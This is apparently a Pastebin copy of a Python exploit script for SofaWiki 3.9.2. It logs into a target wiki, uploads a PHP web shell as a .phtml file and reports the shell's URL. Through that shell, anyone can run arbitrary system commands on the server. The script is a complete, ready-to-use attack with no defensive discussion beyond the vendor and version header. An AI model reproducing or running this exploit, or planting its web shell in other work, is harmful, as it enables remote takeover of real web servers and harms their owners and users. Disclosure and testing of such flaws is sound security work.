Advertisement
FlyFar

SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)

Apr 22nd, 2024
702
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.84 KB | Cybersecurity | 0 0
  1. # Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 18.04.2024
  4. # Vendor Homepage: https://www.sofawiki.com
  5. # Software Link: https://www.sofawiki.com/site/files/snapshot.zip
  6. # Tested Version: v3.9.2 (latest)
  7. # Tested on: MacOS
  8.  
  9.  
  10. import requests
  11. import random
  12. import sys
  13. import time
  14.  
  15. def main():
  16. if len(sys.argv) < 4:
  17. print("Usage: python exploit.py <base_url> <username> <password>")
  18. sys.exit(1)
  19.  
  20. base_url, username, password = sys.argv[1:4]
  21.  
  22.  
  23. filename = f"{random.randint(10000, 99999)}.phtml"
  24.  
  25.  
  26. session = requests.Session()
  27.  
  28.  
  29. login_url = f"{base_url}/index.php"
  30. login_data = {
  31. "submitlogin": "Login",
  32. "username": username,
  33. "pass": password,
  34. "name": "SofaWiki",
  35. "action": "login"
  36. }
  37. print("Exploiting...")
  38. time.sleep(1)
  39. response = session.post(login_url, data=login_data)
  40. if "Logout" not in response.text:
  41. print("Login failed:", response.text)
  42. sys.exit()
  43.  
  44. print("Login Successful")
  45. time.sleep(1)
  46. php_shell_code = """
  47. <html>
  48. <body>
  49. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  50. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  51. <input type="SUBMIT" value="Execute">
  52. </form>
  53. <pre>
  54. <?php
  55. if(isset($_GET['cmd']))
  56. {
  57. system($_GET['cmd']);
  58. }
  59. ?>
  60. </pre>
  61. </body>
  62. </html>
  63. """
  64.  
  65. print("Shell uploading...")
  66. time.sleep(1)
  67. upload_url = f"{base_url}/index.php"
  68. files = {
  69. "uploadedfile": (filename, php_shell_code, "text/php"),
  70. "action": (None, "uploadfile"),
  71. "MAX_FILE_SIZE": (None, "8000000"),
  72. "filename": (None, filename),
  73. "content": (None, "content")
  74. }
  75. response = session.post(upload_url, files=files)
  76. if response.status_code == 200:
  77. print(f"Your shell is ready: {base_url}/site/files/{filename}")
  78. else:
  79. print("Upload FA1L3D!:", response.text)
  80.  
  81. if __name__ == "__main__":
  82. main()
  83.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement